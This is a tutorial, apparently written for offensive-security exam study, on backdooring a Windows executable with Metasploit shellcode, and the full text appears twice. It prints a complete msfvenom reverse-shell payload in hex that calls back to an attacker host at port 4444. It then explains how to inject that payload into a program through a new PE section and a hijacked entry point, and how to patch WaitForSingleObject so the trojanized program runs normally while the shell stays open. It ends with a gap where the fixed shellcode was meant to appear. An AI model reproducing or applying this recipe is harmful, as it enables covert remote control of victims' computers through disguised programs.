Looking for WaitForSingleObject call in modern Metasploit shellcode

Intro

This article describes a process of locating WaitForSingleObject(…) function when msfvenom generated shellcode was used. It deals with a bit of analysis of windows/shell_reverse_tcp.

Step 1: Generating payload

Firstly, we need to generate a shellcode using msfvenom. The main trick is that we need to use EXITFUNC=none so that our program will keep running after the completion of the shellcode.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.46 LPORT=4444 EXITFUNC=none -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of hex file: 648 bytes
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a0568c0a8642e680200115c89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbaac5e25d68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5

I spent a couple of hours trying to figure out why windows/exec payload doesn’t work. The answer is that it’s generating a payload like like shellcode + cmd_string and when shellcode returns from the function it gets right into cmd_string.

Step 2: Preparing executable

Create a new section, so that it has the following attributes: .NewSec, VOffset: 0x46000, VSize: 0x1000, ROffset: 0x2D000, RSize: 0x1000, Flags: 0xE000000E0.

If you doing CTP/OSCE, you are probably familiar with overwriting first bytes of a program (Original Entry Point). You can do that, or you can overwrite AddressOfEntryPoint in PE header.

Then you need to create a code cave like this:

  1. pushad
  2. pushfd
  3. msfvenom generated payload
  4. stack alignment via sub esp, ... or add esp, ...
  5. popfd
  6. popad
  7. return to original flaw (depends on the way you hijacked original flaw)

Step 3: Understanding Metasploit shellcode

I am lazy, so I’m not going to reverse a whole shellcode by myself. The git repo of Metasploit has all assembly source code for payloads. Yes, that simple. For example, here’s our reverse_tcp payload:

  cld                    ; Clear the direction flag.
  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start:                   ;
  pop ebp                ; Pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp.asm"
  ; By here we will have performed the reverse_tcp connection and EDI will be out socket.
%include "./src/block/block_shell.asm"
    ; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"

It consists of multiple submodules, which can be found here.

block_api.asm defines a function to look up API functions. It must be noted that msfvenom generated shellcode looks up API functions by their hashes, not names or addresses. Thus, it doesn’t have any direct pointers and it’s really a pain in the ass when you try to RE it.

To calculate a hash, the following Python code might be used:

def ror( dword, bits ):
  return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF

def unicode( string, uppercase=True ):
  result = "";
  if uppercase:
    string = string.upper()
  for c in string:
    result += c + "\x00"
  return result

def hash( module, function, bits=13, print_hash=True ):
  module_hash = 0
  function_hash = 0
  for c in unicode( module + "\x00" ):
    module_hash  = ror( module_hash, bits )
    module_hash += ord( c )
  for c in str( function + "\x00" ):
    function_hash  = ror( function_hash, bits )
    function_hash += ord( c )
  h = module_hash + function_hash & 0xFFFFFFFF
  if print_hash:
    print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
  return h

if __name__ == '__main__':
    hash('kernel32.dll', 'WaitForSingleObject')

When we run it, it will display the hash of the WaitForSingleObject function in the kernel32.dll module.

$ python hash.py
[+] 0x601D8708 = kernel32.dll!WaitForSingleObject

The hash is 0x601D8708 and we’ll return to it a bit later.

Then we reverse connect to our box using code from block_reverse_tcp.asm. This code just looks up API functions (those push; call ebp; instructions) using the defined function, calls them and then returns socket through edi register. Calling connect, for example, is made like this:

push byte 16           ; length of the sockaddr struct
push esi               ; pointer to the sockaddr struct
push edi               ; the socket
push 0x6174A599        ; hash( "ws2_32.dll", "connect" )
call ebp               ; connect( s, &sockaddr, 16 );

Then the shellcode spawns a shell, using block_shell.asm. This code uses CreateProcessA and uses our socket as stdin, stdout, and stderr.

In block_exitfunk.asm an appropriate exit function get called (the one, specified via EXITFUNC parameter).

Step 4: Fixing shellcode

If we look close to block_shell.asm code, we’ll see it uses the WaitForSingleObject function. This snippet demonstrates this fact:

dec esi                ; Decrement ESI down to -1 (INFINITE)
push esi               ; push INFINITE inorder to wait forever
inc esi                ; Increment ESI back to zero
push dword [eax]       ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708        ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp               ; WaitForSingleObject( pi.hProcess, INFINITE );

After we managed to generate a hash of a function, we are able to read this code easier even if there were no comments. Just look at the push 0x601D8708 instruction.

We see this code uses INFINITE as a value for the dwMilliseconds parameter. The prototype of the WaitForSingleObject function is:

DWORD WINAPI WaitForSingleObject(
  _In_ HANDLE hHandle,
  _In_ DWORD  dwMilliseconds
);

In order to avoid glitching, we must set the value of the dwMilliseconds to a zero. We can simply do that by changing dec esi to nop.

Now our shellcode should look like this:

Copy changes to the executable and save it. Then re-run it and everything should work fine.

Intro

This article describes a process of locating WaitForSingleObject(…) function when msfvenom generated shellcode was used. It deals with a bit of analysis of windows/shell_reverse_tcp.

Step 1: Generating payload

Firstly, we need to generate a shellcode using msfvenom. The main trick is that we need to use EXITFUNC=none so that our program will keep running after the completion of the shellcode.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.46 LPORT=4444 EXITFUNC=none -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of hex file: 648 bytes
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a0568c0a8642e680200115c89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbaac5e25d68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5

I spent a couple of hours trying to figure out why windows/exec payload doesn’t work. The answer is that it’s generating a payload like like shellcode + cmd_string and when shellcode returns from the function it gets right into cmd_string.

Step 2: Preparing executable

Create a new section, so that it has the following attributes: .NewSec, VOffset: 0x46000, VSize: 0x1000, ROffset: 0x2D000, RSize: 0x1000, Flags: 0xE000000E0.

If you doing CTP/OSCE, you are probably familiar with overwriting first bytes of a program (Original Entry Point). You can do that, or you can overwrite AddressOfEntryPoint in PE header.

Then you need to create a code cave like this:

  1. pushad
  2. pushfd
  3. msfvenom generated payload
  4. stack alignment via sub esp, ... or add esp, ...
  5. popfd
  6. popad
  7. return to original flaw (depends on the way you hijacked original flaw)

Step 3: Understanding Metasploit shellcode

I am lazy, so I’m not going to reverse a whole shellcode by myself. The git repo of Metasploit has all assembly source code for payloads. Yes, that simple. For example, here’s our reverse_tcp payload:

  cld                    ; Clear the direction flag.
  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start:                   ;
  pop ebp                ; Pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp.asm"
  ; By here we will have performed the reverse_tcp connection and EDI will be out socket.
%include "./src/block/block_shell.asm"
    ; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"

It consists of multiple submodules, which can be found here.

block_api.asm defines a function to look up API functions. It must be noted that msfvenom generated shellcode looks up API functions by their hashes, not names or addresses. Thus, it doesn’t have any direct pointers and it’s really a pain in the ass when you try to RE it.

To calculate a hash, the following Python code might be used:

def ror( dword, bits ):
  return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF

def unicode( string, uppercase=True ):
  result = "";
  if uppercase:
    string = string.upper()
  for c in string:
    result += c + "\x00"
  return result

def hash( module, function, bits=13, print_hash=True ):
  module_hash = 0
  function_hash = 0
  for c in unicode( module + "\x00" ):
    module_hash  = ror( module_hash, bits )
    module_hash += ord( c )
  for c in str( function + "\x00" ):
    function_hash  = ror( function_hash, bits )
    function_hash += ord( c )
  h = module_hash + function_hash & 0xFFFFFFFF
  if print_hash:
    print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
  return h

if __name__ == '__main__':
    hash('kernel32.dll', 'WaitForSingleObject')

When we run it, it will display the hash of the WaitForSingleObject function in the kernel32.dll module.

$ python hash.py
[+] 0x601D8708 = kernel32.dll!WaitForSingleObject

The hash is 0x601D8708 and we’ll return to it a bit later.

Then we reverse connect to our box using code from block_reverse_tcp.asm. This code just looks up API functions (those push; call ebp; instructions) using the defined function, calls them and then returns socket through edi register. Calling connect, for example, is made like this:

push byte 16           ; length of the sockaddr struct
push esi               ; pointer to the sockaddr struct
push edi               ; the socket
push 0x6174A599        ; hash( "ws2_32.dll", "connect" )
call ebp               ; connect( s, &sockaddr, 16 );

Then the shellcode spawns a shell, using block_shell.asm. This code uses CreateProcessA and uses our socket as stdin, stdout, and stderr.

In block_exitfunk.asm an appropriate exit function get called (the one, specified via EXITFUNC parameter).

Step 4: Fixing shellcode

If we look close to block_shell.asm code, we’ll see it uses the WaitForSingleObject function. This snippet demonstrates this fact:

dec esi                ; Decrement ESI down to -1 (INFINITE)
push esi               ; push INFINITE inorder to wait forever
inc esi                ; Increment ESI back to zero
push dword [eax]       ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708        ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp               ; WaitForSingleObject( pi.hProcess, INFINITE );

After we managed to generate a hash of a function, we are able to read this code easier even if there were no comments. Just look at the push 0x601D8708 instruction.

We see this code uses INFINITE as a value for the dwMilliseconds parameter. The prototype of the WaitForSingleObject function is:

DWORD WINAPI WaitForSingleObject(
  _In_ HANDLE hHandle,
  _In_ DWORD  dwMilliseconds
);

In order to avoid glitching, we must set the value of the dwMilliseconds to a zero. We can simply do that by changing dec esi to nop.

Now our shellcode should look like this:

Copy changes to the executable and save it. Then re-run it and everything should work fine.